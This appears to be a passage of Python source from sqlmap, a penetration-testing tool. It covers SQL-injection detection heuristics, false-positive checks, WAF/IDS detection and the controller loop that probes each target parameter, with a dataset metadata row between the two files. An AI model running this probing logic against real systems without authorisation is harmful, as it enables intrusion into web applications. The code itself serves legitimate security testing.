PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data): pushValue(kb.injection) infoMsg = "checking if the injection point on %s " % injection.place infoMsg += "parameter '%s' is a false positive" % injection.parameter logger.info(infoMsg) def _(): return int(randomInt(2)) + 1 kb.injection = injection for i in xrange(conf.level): randInt1, randInt2, randInt3 = (_() for j in xrange(3)) randInt1 = min(randInt1, randInt2, randInt3) randInt3 = max(randInt1, randInt2, randInt3) while randInt1 >= randInt2: randInt2 = _() while randInt2 >= randInt3: randInt3 = _() if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)): retVal = None break # Just in case if DBMS hasn't properly recovered from previous delayed request if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data: checkBooleanExpression("%d=%d" % (randInt1, randInt2)) if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): retVal = None break elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): retVal = None break elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): retVal = None break if retVal is None: warnMsg = "false positive or unexploitable injection point detected" logger.warn(warnMsg) kb.injection = popValue() return retVal def checkSuhosinPatch(injection): """ Checks for existence of Suhosin-patch (and alike) protection mechanism(s) """ if injection.place == PLACE.GET: debugMsg = "checking for parameter length " debugMsg += "constrainting mechanisms" logger.debug(debugMsg) pushValue(kb.injection) kb.injection = injection randInt = randomInt() if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)): warnMsg = "parameter length constrainting " warnMsg += "mechanism detected (e.g. Suhosin patch). " warnMsg += "Potential problems in enumeration phase can be expected" logger.warn(warnMsg) kb.injection = popValue() def checkFilteredChars(injection): debugMsg = "checking for filtered characters" logger.debug(debugMsg) pushValue(kb.injection) kb.injection = injection randInt = randomInt() # all other techniques are already using parentheses in tests if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)): warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are " warnMsg += "filtered by the back-end server. There is a strong " warnMsg += "possibility that sqlmap won't be able to properly " warnMsg += "exploit this vulnerability" logger.warn(warnMsg) # inference techniques depend on character '>' if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)): warnMsg = "it appears that the character '>' is " warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "advised to rerun with the '--tamper=between'" logger.warn(warnMsg) kb.injection = popValue() def heuristicCheckSqlInjection(place, parameter): if kb.nullConnection: debugMsg = "heuristic check skipped " debugMsg += "because NULL connection used" logger.debug(debugMsg) return None if wasLastResponseDBMSError(): debugMsg = "heuristic check skipped " debugMsg += "because original page content " debugMsg += "contains DBMS error" logger.debug(debugMsg) return None origValue = conf.paramDict[place][parameter] prefix = "" suffix = "" if conf.prefix or conf.suffix: if conf.prefix: prefix = conf.prefix if conf.suffix: suffix = conf.suffix randStr = "" while '\'' not in randStr: randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET) kb.heuristicMode = True payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) page, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.heuristicMode = False parseFilePaths(page) result = wasLastResponseDBMSError() infoMsg = "heuristic (basic) test shows that %s " % place infoMsg += "parameter '%s' might " % parameter def _(page): return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS) casting = _(page) and not _(kb.originalPage) if not casting and not result and kb.dynamicParameter and origValue.isdigit(): randInt = int(randomInt()) payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) result = Request.queryPage(payload, place, raise404=False) if not result: randStr = randomStr() payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) casting = Request.queryPage(payload, place, raise404=False) kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE if casting: errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type") errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter) errMsg += "at the back-end web application" logger.error(errMsg) if kb.ignoreCasted is None: message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]") kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N' elif result: infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() logger.info(infoMsg) else: infoMsg += "not be injectable" logger.warn(infoMsg) kb.heuristicMode = True value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()) payload = "%s%s%s" % (prefix, "'%s" % value, suffix) payload = agent.payload(place, parameter, newValue=payload) page, _ = Request.queryPage(payload, place, content=True, raise404=False) if value in (page or ""): infoMsg = "heuristic (XSS) test shows that %s " % place infoMsg += "parameter '%s' might " % parameter infoMsg += "be vulnerable to XSS attacks" logger.info(infoMsg) kb.heuristicMode = False return kb.heuristicTest def checkDynParam(place, parameter, value): """ This function checks if the URL parameter is dynamic. If it is dynamic, the content of the page differs, otherwise the dynamicity might depend on another parameter. """ if kb.redirectChoice: return None kb.matchRatio = None dynResult = None randInt = randomInt() infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) try: payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) if not dynResult: infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) randInt = randomInt() payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) except SqlmapConnectionException: pass result = None if dynResult is None else not dynResult kb.dynamicParameter = result return result def checkDynamicContent(firstPage, secondPage): """ This function checks for the dynamic content in the provided pages """ if kb.nullConnection: debugMsg = "dynamic content checking skipped " debugMsg += "because NULL connection used" logger.debug(debugMsg) return if any(page is None for page in (firstPage, secondPage)): warnMsg = "can't check dynamic content " warnMsg += "because of lack of page content" logger.critical(warnMsg) return seqMatcher = getCurrentThreadData().seqMatcher seqMatcher.set_seq1(firstPage) seqMatcher.set_seq2(secondPage) # In case of an intolerable difference turn on dynamicity removal engine if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND: findDynamicContent(firstPage, secondPage) count = 0 while not Request.queryPage(): count += 1 if count > conf.retries: warnMsg = "target URL is too dynamic. " warnMsg += "Switching to '--text-only' " logger.warn(warnMsg) conf.textOnly = True return warnMsg = "target URL is heavily dynamic" warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) secondPage, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) def checkStability(): """ This function checks if the URL content is stable requesting the same page two times with a small delay within each request to assume that it is stable. In case the content of the page differs when requesting the same page, the dynamicity might depend on other parameters, like for instance string matching (--string). """ infoMsg = "testing if the target URL is stable. This can take a couple of seconds" logger.info(infoMsg) firstPage = kb.originalPage # set inside checkConnection() time.sleep(1) secondPage, _ = Request.queryPage(content=True, raise404=False) if kb.redirectChoice: return None kb.pageStable = (firstPage == secondPage) if kb.pageStable: if firstPage: infoMsg = "target URL is stable" logger.info(infoMsg) else: errMsg = "there was an error checking the stability of page " errMsg += "because of lack of content. Please check the " errMsg += "page request results (and probable errors) by " errMsg += "using higher verbosity levels" logger.error(errMsg) else: warnMsg = "target URL is not stable. sqlmap will base the page " warnMsg += "comparison on a sequence matcher. If no dynamic nor " warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " warnMsg += "'Page comparison' and provide a string or regular " warnMsg += "expression to match on" logger.warn(warnMsg) message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] " test = readInput(message, default="C") if test and test[0] in ("q", "Q"): raise SqlmapUserQuitException elif test and test[0] in ("s", "S"): showStaticWords(firstPage, secondPage) message = "please enter value for parameter 'string': " test = readInput(message) if test: conf.string = test if kb.nullConnection: debugMsg = "turning off NULL connection " debugMsg += "support because of string checking" logger.debug(debugMsg) kb.nullConnection = None else: errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) elif test and test[0] in ("r", "R"): message = "please enter value for parameter 'regex': " test = readInput(message) if test: conf.regex = test if kb.nullConnection: debugMsg = "turning off NULL connection " debugMsg += "support because of regex checking" logger.debug(debugMsg) kb.nullConnection = None else: errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) else: checkDynamicContent(firstPage, secondPage) return kb.pageStable def checkString(): if not conf.string: return True infoMsg = "testing if the provided string is within the " infoMsg += "target URL page content" logger.info(infoMsg) page, headers = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if conf.string not in rawResponse: warnMsg = "you provided '%s' as the string to " % conf.string warnMsg += "match, but such a string is not within the target " warnMsg += "URL raw response, sqlmap will carry on anyway" logger.warn(warnMsg) return True def checkRegexp(): if not conf.regexp: return True infoMsg = "testing if the provided regular expression matches within " infoMsg += "the target URL page content" logger.info(infoMsg) page, headers = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): warnMsg = "you provided '%s' as the regular expression to " % conf.regexp warnMsg += "match, but such a regular expression does not have any " warnMsg += "match within the target URL raw response, sqlmap " warnMsg += "will carry on anyway" logger.warn(warnMsg) return True def checkWaf(): """ Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ if not conf.checkWaf: return False infoMsg = "heuristically checking if the target is protected by " infoMsg += "some kind of WAF/IPS/IDS" logger.info(infoMsg) retVal = False backup = dict(conf.parameters) payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload) logger.log(CUSTOM_LOGGING.PAYLOAD, payload) kb.matchRatio = None Request.queryPage() if kb.errorIsNone and kb.matchRatio is None: kb.matchRatio = LOWER_RATIO_BOUND conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt()) trueResult = Request.queryPage() if trueResult: conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD) try: falseResult = Request.queryPage() except SqlmapConnectionException: falseResult = None if not falseResult: retVal = True conf.parameters = dict(backup) if retVal: warnMsg = "it appears that the target is protected. Please " warnMsg += "consider usage of tamper scripts (option '--tamper')" logger.warn(warnMsg) else: infoMsg = "it appears that the target is not protected" logger.info(infoMsg) return retVal def identifyWaf(): if not conf.identifyWaf: return None kb.testMode = True infoMsg = "using WAF scripts to detect " infoMsg += "backend WAF/IPS/IDS protection" logger.info(infoMsg) @cachedmethod def _(*args, **kwargs): page, headers, code = None, None, None try: if kwargs.get("get"): kwargs["get"] = urlencode(kwargs["get"]) kwargs["raise404"] = False kwargs["silent"] = True page, headers, code = Request.getPage(*args, **kwargs) except Exception: pass return page or "", headers or {}, code retVal = False for function, product in kb.wafFunctions: try: logger.debug("checking for WAF/IDS/IPS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " errMsg += "WAF script for '%s' ('%s')" % (product, ex) logger.critical(errMsg) found = False if found: retVal = product break if retVal: errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal errMsg += "consider usage of tamper scripts (option '--tamper')" logger.critical(errMsg) message = "are you sure that you want to " message += "continue with further target testing? [y/N] " output = readInput(message, default="N") if output and output[0] not in ("Y", "y"): raise SqlmapUserQuitException else: infoMsg = "no WAF/IDS/IPS product has been identified" logger.info(infoMsg) kb.testType = None kb.testMode = False return retVal def checkNullConnection(): """ Reference: http://www.wisec.it/sectou.php?id=472f952d79293 """ if conf.data: return False infoMsg = "testing NULL connection to the target URL" logger.info(infoMsg) pushValue(kb.pageCompress) kb.pageCompress = False try: page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD infoMsg = "NULL connection is supported with HEAD header" logger.info(infoMsg) else: page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"}) if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}): kb.nullConnection = NULLCONNECTION.RANGE infoMsg = "NULL connection is supported with GET header " infoMsg += "'%s'" % kb.nullConnection logger.info(infoMsg) else: _, headers, _ = Request.getPage(skipRead = True) if HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.SKIP_READ infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) except SqlmapConnectionException, errMsg: errMsg = getUnicode(errMsg) raise SqlmapConnectionException(errMsg) kb.pageCompress = popValue() return kb.nullConnection is not None def checkConnection(suppressOutput=False): if not any((conf.proxy, conf.tor, conf.dummy)): try: socket.getaddrinfo(conf.hostname, None) except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy: infoMsg = "testing connection to the target URL" logger.info(infoMsg) try: page, _ = Request.queryPage(content=True, noteResponseTime=False) kb.originalPage = kb.pageTemplate = page kb.errorIsNone = False if not kb.originalPage and wasLastResponseHTTPError(): errMsg = "unable to retrieve page content" raise SqlmapConnectionException(errMsg) elif wasLastResponseDBMSError(): warnMsg = "there is a DBMS error found in the HTTP response body " warnMsg += "which could interfere with the results of the tests" logger.warn(warnMsg) elif wasLastResponseHTTPError(): warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError() warnMsg += "which could interfere with the results of the tests" logger.warn(warnMsg) else: kb.errorIsNone = True except SqlmapConnectionException, errMsg: if conf.ipv6: warnMsg = "check connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " warnMsg += "(e.g. 'ping6 -I eth0 %s') " % conf.hostname warnMsg += "prior to running sqlmap to avoid " warnMsg += "any addressing issues" singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): errMsg = getUnicode(errMsg) logger.critical(errMsg) if conf.multipleTargets: return False msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] " if readInput(msg, default="Y") not in ("n", "N"): raise SqlmapSilentQuitException else: kb.ignoreNotFound = True else: raise return True def setVerbosity(): # Cross-linked function raise NotImplementedError
55,231
Python
.py
1,037
38.557377
235
0.577101
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,974
controller.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/controller.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re from lib.controller.action import action from lib.controller.checks import checkSqlInjection from lib.controller.checks import checkDynParam from lib.controller.checks import checkStability from lib.controller.checks import checkString from lib.controller.checks import checkRegexp from lib.controller.checks import checkConnection from lib.controller.checks import checkNullConnection from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection from lib.controller.checks import identifyWaf from lib.core.agent import agent from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect from lib.core.common import parseTargetUrl from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeCSValue from lib.core.common import showHttpErrorCodes from lib.core.common import urlencode from lib.core.common import urldecode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTPMETHOD from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import ASP_NET_CONTROL_REGEX from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import EMPTY_FORM_FIELDS_REGEX from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import LOW_TEXT_PERCENT from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX from lib.core.settings import HOST_ALIASES from lib.core.settings import REFERER_ALIASES from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv from thirdparty.pagerank.pagerank import get_pagerank def _selectInjection(): """ Selection function for injection place, parameters and type. """ points = {} for injection in kb.injections: place = injection.place parameter = injection.parameter ptype = injection.ptype point = (place, parameter, ptype) if point not in points: points[point] = injection else: for key in points[point].keys(): if key != 'data': points[point][key] = points[point][key] or injection[key] points[point]['data'].update(injection['data']) if len(points) == 1: kb.injection = kb.injections[0] elif len(points) > 1: message = "there were multiple injection points, please select " message += "the one to use for following injections:\n" points = [] for i in xrange(0, len(kb.injections)): place = kb.injections[i].place parameter = kb.injections[i].parameter ptype = kb.injections[i].ptype point = (place, parameter, ptype) if point not in points: points.append(point) ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype message += "[%d] place: %s, parameter: " % (i, place) message += "%s, type: %s" % (parameter, ptype) if i == 0: message += " (default)" message += "\n" message += "[q] Quit" select = readInput(message, default="0") if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0: index = int(select) elif select[0] in ("Q", "q"): raise SqlmapUserQuitException else: errMsg = "invalid choice" raise SqlmapValueException(errMsg) kb.injection = kb.injections[index] def _formatInjection(inj): data = "Place: %s\n" % inj.place data += "Parameter: %s\n" % inj.parameter for stype, sdata in inj.data.items(): title = sdata.title vector = sdata.vector comment = sdata.comment payload = agent.adjustLateValues(sdata.payload) if inj.place == PLACE.CUSTOM_HEADER: payload = payload.split(',', 1)[1] if stype == PAYLOAD.TECHNIQUE.UNION: count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: title = title.replace("columns", "column") elif comment: vector = "%s%s" % (vector, comment) data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus)) data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" return data def _showInjections(): header = "sqlmap identified the following injection points with " header += "a total of %d HTTP(s) requests" % kb.testQueryCount if hasattr(conf, "api"): conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES) else: data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n") conf.dumper.string(header, data) if conf.tamper: warnMsg = "changes made by tampering scripts are not " warnMsg += "included in shown payload content(s)" logger.warn(warnMsg) if conf.hpp: warnMsg = "changes made by HTTP parameter pollution are not " warnMsg += "included in shown payload content(s)" logger.warn(warnMsg) def _randomFillBlankFields(value): retVal = value if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value): message = "do you want to fill blank fields with random values? [Y/n] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal): item = match.group("result") if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item): if item[-1] == DEFAULT_GET_POST_DELIMITER: retVal = retVal.replace(item, "%s%s%s" % (item[:-1], randomStr(), DEFAULT_GET_POST_DELIMITER)) else: retVal = retVal.replace(item, "%s%s" % (item, randomStr())) return retVal def _saveToHashDB(): injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or [] injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None) _ = dict() for injection in injections: key = (injection.place, injection.parameter, injection.ptype) if key not in _: _[key] = injection else: _[key].data.update(injection.data) hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True) _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set() _.update(kb.absFilePaths) hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True) if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS): hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True) if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS): hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True) def _saveToResultsFile(): if not conf.resultsFP: return results = {} techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE))) for inj in kb.injections: if inj.place is None or inj.parameter is None: continue key = (inj.place, inj.parameter) if key not in results: results[key] = [] results[key].extend(inj.data.keys()) for key, value in results.items(): place, parameter = key line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep) conf.resultsFP.writelines(line) if not results: line = "%s,,,%s" % (conf.url, os.linesep) conf.resultsFP.writelines(line) def start(): """ This function calls a function that performs checks on both URL stability and all GET, POST, Cookie and User-Agent parameters to check if they are dynamic and SQL injection affected """ if conf.direct: initTargetEnv() setupTargetEnv() action() return True if conf.url and not any((conf.forms, conf.crawlDepth)): kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None)) if conf.configFile and not kb.targets: errMsg = "you did not edit the configuration file properly, set " errMsg += "the target URL, list of targets or google dork" logger.error(errMsg) return False if kb.targets and len(kb.targets) > 1: infoMsg = "sqlmap got a total of %d targets" % len(kb.targets) logger.info(infoMsg) hostCount = 0 initialHeaders = list(conf.httpHeaders) for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: conf.url = targetUrl conf.method = targetMethod conf.data = targetData conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) initTargetEnv() parseTargetUrl() testSqlInj = False if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]): for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]): paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0]) if paramKey not in kb.testedParams: testSqlInj = True break else: paramKey = (conf.hostname, conf.path, None, None) if paramKey not in kb.testedParams: testSqlInj = True if testSqlInj and conf.hostname in kb.vulnHosts: if kb.skipVulnHost is None: message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' testSqlInj = not kb.skipVulnHost if not testSqlInj: infoMsg = "skipping '%s'" % targetUrl logger.info(infoMsg) continue if conf.multipleTargets: hostCount += 1 if conf.forms: message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl) else: message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "") if conf.cookie: message += "\nCookie: %s" % conf.cookie if conf.data is not None: message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else "" if conf.forms: if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1: continue message += "\ndo you want to test this form? [Y/n/q] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): if conf.method == HTTPMETHOD.POST: message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) conf.data = _randomFillBlankFields(conf.data) conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data elif conf.method == HTTPMETHOD.GET: if targetUrl.find("?") > -1: firstPart = targetUrl[:targetUrl.find("?")] secondPart = targetUrl[targetUrl.find("?") + 1:] message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) conf.url = "%s?%s" % (firstPart, test) parseTargetUrl() elif test[0] in ("n", "N"): continue elif test[0] in ("q", "Q"): break else: message += "\ndo you want to test this URL? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): dataToStdout(os.linesep) continue elif test[0] in ("q", "Q"): break infoMsg = "testing URL '%s'" % targetUrl logger.info(infoMsg) setupTargetEnv() if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): continue if conf.checkWaf: checkWaf() if conf.identifyWaf: identifyWaf() if conf.nullConnection: checkNullConnection() if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ and (kb.injection.place is None or kb.injection.parameter is None): if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: # NOTE: this is not needed anymore, leaving only to display # a warning message to the user in case the page is not stable checkStability() # Do a little prioritization reorder of a testable parameter list parameters = conf.parameters.keys() # Order of testing list (first to last) orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET) for place in orderList[::-1]: if place in parameters: parameters.remove(place) parameters.insert(0, place) proceed = True for place in parameters: # Test User-Agent and Referer headers only if # --level >= 3 skip = (place == PLACE.USER_AGENT and conf.level < 3) skip |= (place == PLACE.REFERER and conf.level < 3) # Test Host header only if # --level >= 5 skip |= (place == PLACE.HOST and conf.level < 5) # Test Cookie header only if --level >= 2 skip |= (place == PLACE.COOKIE and conf.level < 2) skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True)) if skip: continue if place not in conf.paramDict: continue paramDict = conf.paramDict[place] for parameter, value in paramDict.items(): if not proceed: break kb.vainRun = False testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) if paramKey in kb.testedParams: testSqlInj = False infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter in conf.testParameter: pass elif parameter == conf.rParam: testSqlInj = False infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter in conf.skip: testSqlInj = False infoMsg = "skipping %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter == conf.csrfToken: testSqlInj = False infoMsg = "skipping CSRF protection token parameter '%s'" % parameter logger.info(infoMsg) # Ignore session-like parameters for --level < 4 elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): testSqlInj = False infoMsg = "ignoring %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: check = checkDynParam(place, parameter, value) if not check: warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter) logger.warn(warnMsg) else: infoMsg = "%s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) if testSqlInj: check = heuristicCheckSqlInjection(place, parameter) if check != HEURISTIC_TEST.POSITIVE: if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED): infoMsg = "skipping %s parameter '%s'" % (place, parameter) logger.info(infoMsg) continue infoMsg = "testing for SQL injection on %s " % place infoMsg += "parameter '%s'" % parameter logger.info(infoMsg) injection = checkSqlInjection(place, parameter, value) proceed = not kb.endDetection if injection is not None and injection.place is not None: kb.injections.append(injection) # In case when user wants to end detection phase (Ctrl+C) if not proceed: break msg = "%s parameter '%s' " % (injection.place, injection.parameter) msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " test = readInput(msg, default="N") if test[0] not in ("y", "Y"): proceed = False paramKey = (conf.hostname, conf.path, None, None) 